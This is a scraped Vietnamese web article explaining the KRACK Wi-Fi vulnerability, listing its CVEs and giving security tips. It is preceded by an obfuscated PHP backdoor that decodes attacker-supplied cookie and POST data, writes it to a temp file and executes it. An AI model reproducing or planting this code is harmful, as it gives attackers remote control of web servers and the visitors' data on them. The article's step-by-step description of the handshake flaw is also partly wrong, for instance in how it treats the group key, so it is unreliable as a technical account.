$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Kỹ thuật tấn công, hậu quả và cách khắc phục mạng wifi sau sự cố KRACK - Tải Chùa

Kỹ thuật tấn công, hậu quả và cách khắc phục mạng wifi sau sự cố KRACK

Rate this post
Kỹ thuật tấn công mạng wifi krack, những hậu quả mà lỗ hổng bảo mật này gây ra đồng thời chúng tôi đưa ra cách khắc phục sau sự cố KRACK giúp an toàn hơn khi sử dụng internet

Mạng không dây Wifi giúp con người gần nhau hơn, đặc biệt các thông tin được truyền tải khá nhanh. Tuy nhiên việc truyền tải thông tin trên internet cũng vô cùng nguy hiểm khi những lỗ hổng bảo mật chưa được giải quyết. Trong đó có lỗ hổng bảo mật KRACK đây là lỗ hổng cực kỳ nghiêm  trọng, chúng mới được phát hiện gần đây, gây hậu quả nghiêm trọng nếu không được khắc phục và giải quyết kịp thời.

Tìm hiểu về lỗ hổng bảo mật KRACK

KRACK là từ viết tắc của Key Reinstallation Attack đây là lỗ hổng Wifi, hacker có thể lợi dụng điều này để truy cập vào các modem Wifi có sử dụng giao thức WP2 – đây là giao thức được hầu hết người dùng sử dụng để đặt mật khẩu Wifi, hacker có thể giả mạo địa chỉ MAC và thay đổi kênh Wifi bạn đang dùng, từ đó có thể ép buộc bạn kết nối với mạng wifi giả mạo để thu thập dữ liệu hoặc tiến hành tấn công vào mạng nội bộ.

Lỗi wifi KRACK bẻ gãy bảo mật WPA/WPA2

Lỗi wifi KRACK bẻ gãy bảo mật WPA/WPA2

Lỗi Wifi này khiến hacker có thể dễ dàng chiếm đoạt những thông tin cá nhân nhạy cảm của người dùng đặc biệt là thẻ ngân hàng, mật khẩu, email, hình ảnh,… cùng những thông tin quan trọng. Bất cứ những thông tin nào của bạn sử dụng trong khi kết nối wifi mà bị dính KRACK đều bị giải mã và thhu thập.

Lỗ hổng KRACK có thể khai thác để triển khai tấn công mở khóa, packet replay, TCP connection hijacking, hay chèn nội dung xấu vào kết nối HTTP,…những lỗ hổng này có ở cấp độ giao thức nên tất cả những thiết lập của chuẩn này sẽ đều bị ảnh hưởng. Không chỉ bị ảnh hưởng các mạng wifi dùng giao thức bảo mật WPA, WPA2 mà còn gây ảnh hưởng  tới cả mac OS, iOS, Android và những thiết bị nhân Linux.

Kỹ thuật tấn công mạng wifi KRACK đã phá vỡ bảo mật WPA2

Kỹ thuật tấn công KRACK là một trong những kỹ thuật tấn công đầu tiên trong vòng 15 năm qua có thể bẻ gãy được cơ chế bảo mật WPA/WPA2 khá vững chãi, chúng không phải là kỹ thuật tấn công đơn lẻ mà là 1 bộ phận các lỗi bảo mật được phối hợp để hạ gục cơ chế bảo mật WPA.

Với kỹ thuật này thì hacker có thể giải mã những kết nối wifi của bạn, họ sẽ coi được bạn đang coi trang web nào, đang nói chuyện với ai, gõ mật khẩu vô trang web nào, và dĩ nhiên mật khẩu của bạn cũng được hacker biết bằng cách chèn vào kết nối mạng wifi của bạn virus, những trang đăng nhập giả,… chúng sẽ tấn công bạn sâu hơn để biết bạn đang theo dõi trang web gì, bị điều khiển máy tính, điện thoại, bị nghe lén, bị quay lén hay bị mất những dữ liệu nhạy cảm.

Kỹ thuật tấn công KRACK

Kỹ thuật tấn công KRACK

Kỹ thuật tấn công KRACK là một bộ bao gồm 10 lỗi bảo mật được phối hợp để phá vỡ cơ chế mã hóa WPA/WPA2. Kỹ thuật này dựa trên điểm sơ hở trong quá trình kết nối giữa thiết bị phát và truy cập wifi, ở đây lỗi cụ thể đó là Reinstallation Encryption Key, nó được thể hiện qua 4 bước sau:

  • Bước 1: Thiết bị muốn truy cập wifi (gọi tắt là client), muốn truy cập tới wifi Router (gọi tắt là Router) sẽ dò mạng và sẽ thấy sóng của Router. Trong sóng phát public của Router có cài một mã Random gọi là ANONCE, client sẽ nhận lấy mã ANONCE này.
  • Bước 2: Client sẽ lấy ANONCE sau đó tính toán và đưa ra một mã Random khác gọi là SNONCE và gửi cho Router cùng một số thông tin được mã hóa.
  • Bước 3: Sau khi Router nhận được SNONCE sẽ nhận biết client có pass wifi đúng và sẽ gửi lại cho Router 1 mã khóa chung, mã khóa này được gọi là GTK (viết tắt của từ Group Tempolary Key).
  • Bước 4: Khi client nhận được  khóa chung GTK thì sẽ lưu lại (INSTALLATION) sau đó mã hóa thư gửi lại cho Router để biết được là client đã nhận được khóa, để client và router giao tiếp với nhau.

Trong cơ chế này, nếu client không nhận được mã khóa chung ở bước 3 thì những dữ liệu quan trọng sẽ không được chuyển tiếp, sau đó kết nối báo lỗi. Vậy trong 4 bước trên lỗ hổng có ở đâu?

Vấn đề lỗi xảy ra ở bước 3, chính bước này tạo ra lỗ hổng KRACK, khi có hacker tấn công giữa bước 3 và bước 4, tức là khi Router gửi mã GTK cho client nhưng hacker đã lấy mã này. Khi đó client không nhận được mã GTK sẽ không có key để mã hóa dữ liệu gửi đi. Sau khoảng thời gian Router không thấy client gửi lại mã nên Router sẽ gửi lại mã GTK đã gửi cho client khi trước. Lúc này cả hacker và client đều có một mã GTK, khi đó hacker có thể giải mã mọi giữ liệu mà client và router gửi qua lại cho nhau.

Kỹ thuật tấn công KRACK phối hợp phá vỡ cơ chế WPA/WPA2

Kỹ thuật tấn công KRACK phối hợp phá vỡ cơ chế WPA/WPA2

Về cơ bản để đảm bảo việc bảo mật thì một khóa chỉ nên được cài đặt và sử dụng một lần, tuy nhiên với giao thức WPA2 khá sẽ được gửi lại, lợi dụng điểm yếu này hacker đã lấy được mã từ đó những thông tin của bạn được hacker lấy một cách dễ dàng.

Có 10 lỗi liên quan tới lỗ hổng bảo mật Reintall key trên giao thức WPA2

  • CVE-2017-13077: Reinstallation of the pairwise encryption key (PTK-TK) in the 4-way handshake.
  • CVE-2017-13078: Reinstallation of the group key (GTK) in the 4-way handshake.
  • CVE-2017-13079: Reinstallation of the integrity group key (IGTK) in the 4-way handshake.
  • CVE-2017-13080: Reinstallation of the group key (GTK) in the group key handshake.
  • CVE-2017-13081: Reinstallation of the integrity group key (IGTK) in the group key handshake.
  • CVE-2017-13082: Accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it.
  • CVE-2017-13084: Reinstallation of the STK key in the PeerKey handshake.
  • CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake.
  • CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
  • CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.

Lỗi liên quan tới lỗ hổng bảo mật KRACK

Lỗi liên quan tới lỗ hổng bảo mật KRACK

Hậu quả khi mạng wifi bị hacker tấn công lỗ hổng KRACK

Ngoài việc, những tin tặc có thể giải mã, nghe trộm các gói tệp tin được truyền đi và nhận lại giữa thiết bị của bạn và điểm truy cập thì hacker còn có thể thực hiện một dạng tấn công phổ biến khác vào mạng wifi đó là cài đặt virus vào trong kết nối http không được mã hóa. Phương thức tấn công này có khả năng thực hiện trên nhiều nền tảng khác nhau trong đó có các nền tảng phổ biến như Windows, Android, Linux, MacOS và iOS của Apple. Khi tấn công các thiết bị này những kẻ xấu có thể đọc được toàn bộ dữ liệu truyền đi từ thiết bị của bạn. Trong những nền tảng phổ biến này thì có 41% những thiết bị Android đứng trước nguy cơ tấn công nhiều nhất qua kết nối wifi bởi những phương thức khác nhau. 

Cách bảo mật mạng wifi sau sự cố KRACK

Nhiều người cho rằng sau sự cố KRACK thì cần phải đặt lại mật khẩu để bảo vệ mạng wifi tuy nhiên đây không phải là cách duy nhất, bạn có thể áp dụng những cách dưới đây để mạng không gian trở nên an toàn hơn:

  • Sử dụng tên mạng (SSID) khó phát hiện: SSID là bộ phận nhận dạng thiết lập dịch vụ SSID bạn có thể hiểu là tên gọi mạng wifi, đây là một trong những cài đặt cơ bản và chúng khá đơn giản. Nếu nghĩ rằng chúng chỉ để định danh thì chưa hẳn đã đúng vì nó có liên quan tới bảo mật. Sử dụng tên mạng phổ biến hoặc tên mặc định của nhà cung cấp có thể khiến hacker dễ dàng phá vỡ chế độ bảo mật cá nhân qua WPA/WPA2.Thuật toán mã hóa được kết hợp với SSID trong khi đó hacker có kho lưu trữ mật khẩu được cài đặt sẵn với các SSID phổ biến và mặc định của nhà cung cấp.
  • Vậy đặt tên mạng như thế nào tốt cho việc bảo mật? Những công ty, cửa hàng hầu hết đều đặt tên mạng là tên công ty, cửa hàng đó điều này giúp ích cho tổ chức cá nhân nhưng không phải là ý tưởng hay bởi nếu hacker dạo quanh khu vực của bạn, tên mạng sẽ được cung cấp thông tin về đơn vị sở hữu và từ đó chúng sẽ dễ dàng xác định được mục tiêu, biết được sẽ có gì khi phá vỡ bảo mật của mạng wifi đó.
  • Bảo mật vật lý: Một mạng wifi không dây có thể bị phá vỡ bởi những lý do rất nhỏ, có thể là từ vị trí đặt router, hacker có thể sử dụng nút reset trên bộ phận phát để khôi phục cài đặt gốc từ đó có thể dễ dàng truy cập vào mạng nhằm khai thác thông tin, lưu ý rằng những tin tạc cũng có thể khai thác lỗ hổng bảo mật qua bộ thu phát mở rộng sóng (repeater).

Bảo mật wifi sau sự cố KRACK

Bảo mật wifi sau sự cố KRACK

  • Cơ chế bảo mật dùng cho doanh nghiệp: Sau khi mạng wifi của bạn bị sự cố KRACK bạn mới nhận ra được rằng: những cài đặt bảo mật dùng cho doanh nghiệp tương đối phức tạp tuy nhiên chúng lại mang lại lợi ích rất lớn bởi chúng xác thực với mỗi người dùng riêng lẻ. Tất cả người dùng đều có tên và mật khẩu đăng nhập của riêng mình. Vì thế, khi các thiết bị như điện thoại, máy tính bị mất, hay các nhân viên nghỉ việc thì người quản trị viên chỉ cần xóa định danh đã cung cấp cho các thiết bị hay người đó trên hệ thống. Trong trường hợp dùng bảo mật thông thường thì công việc thay đổi mật khẩu thường xuyên sẽ ảnh hưởng tới các thiết bị và mọi người trong công ty. Chế độ bảo mật doanh nghiệp sẽ chỉ định khóa mã hóa cho mỗi người dùng, người đó chỉ có thể giải mã dữ liệu, lưu lượng truy cập cho kết nối của riêng họ.
  • Bật chế độ xác thực 802.1X cho các máy trạm: Các chế độ bảo mật sẽ có những ưu và nhược điểm riêng, ví dụ như chế độ bảo mật doanh nghiệp ở trên tin tặc rất có thể sẽ giả lập máy chỉ với tên wifi đúng như của công ty bạn, thiết bị của người dùng khi đó sẽ cố gắng truy cập với các thông tin như tên gọi, pass sau đó sẽ bị chiếm đoạt và tin tắc sẽ sử dụng những thông tin mà chúng lấy được để truy cập vào mạng wifi thực. Vì vậy hãy bật đồng thời các cơ chế bảo mật, trong đó có xác thực 802.1X, đây là chế độ bảo mật cho phép các máy trạm phải xác minh máy chỉ trước khi kết nối, tùy thuộc vào thiết bị hay hệ điều hành của máy trạm để có thể xác minh chính xác máy chủ.
  • Sử dụng các phần mềm bảo mật và cập nhật phiên bản mới nhất: Kỹ thuật tấn công KRACK này mới chỉ được phát hiện trong nửa đầu tháng 10 này vì thế chắc chắn những nhà sản xuất sẽ sớm cập nhật phần mềm cho máy trạm lẫn các router, chính vì vậy bạn nên chú ý cập nhật phiên bản mới nhất bởi những phiên bản phần mềm mới nhất sẽ vá lỗi, khắc phục lỗi cho những phiên bản cũ .

Trên đây là tất cả những tìm hiểu về kỹ thuật tấn công KRACK đã bẻ gãy cơ chế bảo mật WPA/WPA2 gây ra hậu quả khôn lường bạn có thể tham khảo. Đồng thời cũng là những cách khắc phục sau khi bị tấn công KRACK cho bạn tham khảo để giúp an toàn hơn khi giao tiếp trên internet.

Attacks KRACK with Linux